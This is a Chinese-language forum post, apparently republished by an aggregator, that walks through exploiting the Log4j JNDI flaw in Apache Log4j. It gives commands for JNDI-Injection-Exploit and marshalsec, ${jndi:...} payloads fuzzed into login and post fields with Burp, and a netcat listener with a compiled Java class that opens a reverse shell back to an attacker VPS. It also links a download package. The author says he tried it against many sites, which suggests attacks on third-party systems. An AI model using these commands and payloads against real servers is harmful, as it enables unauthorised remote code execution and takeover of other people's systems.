Apache-Log4j
2021-12-11 01:10:24 Author: forum.90sec.com(查看原文) 阅读量:201 收藏

一 漏洞检测:

  1. xx.24b5010c.dns.1433.eu.org //dnslog地址
    10.10.10.10 //vps外网地址

  2. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping xx.24b5010c.dns.1433.eu.org" -A 10.10.10.10
    得到类似几个地址:
    rmi://10.10.10.10:1099/iqnqyi
    ldap://10.10.10.10:1389/iqnqyi
    rmi://10.10.10.10:1099/3vmqfk
    ldap://10.10.10.10:1389/3vmqfk
    rmi://10.10.10.10:1099/jan8oe

保存fuzz.txt

  1. 在系统登录处或者post主页:
    ${jndi:exp}
    burpsuite exp设置变量,加载字典fuzz.txt,去掉转义,刷新dnslog查看数据。

  2. 记得查看防火墙放行端口。

二 命令执行:

  1. vps开启web服务和监听端口
    python3 -m http.server 9092,以及监听端口nc -l 9091

windows,使用./src/ExecTemplateJDK7.java 修改里面的host和port为要反弹的地址
linux,使用./src/linux.java,其实是cmd.exe改成/bin/bash

  1. 编译:javac ExecTemplateJDK7.java,生成ExecTemplateJDK7.class

  2. 执行:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.10.10.10:9092/#ExecTemplateJDK7 1389

  3. 在系统登录处或者post主页:${jndi:exp}
    burpsuite exp设置变量,加载字典fuzz.txt,去掉转义

  4. 看nc情况

打包下载地址:链接: https://pan.baidu.com/s/1Ka2jg-C-Wqn92vFBM2ReNw 提取码: 9e71 复制这段内容后

申明:我测试了好多个站都没有检测成功有,不知道是exp的问题还是站的问题。有复现成功的吱一声谢谢。

burp检测插件ceeio,GitHub - guguyu1/log4j2_burp_scan: log4j2 被动 burp rce扫描工具 get post cookie 全参数识别
dnslog:GitHub - f0ng/log4jscanner: log4j burp插件


文章来源: https://forum.90sec.com/t/topic/1939
如有侵权请联系:admin#unsafe.sh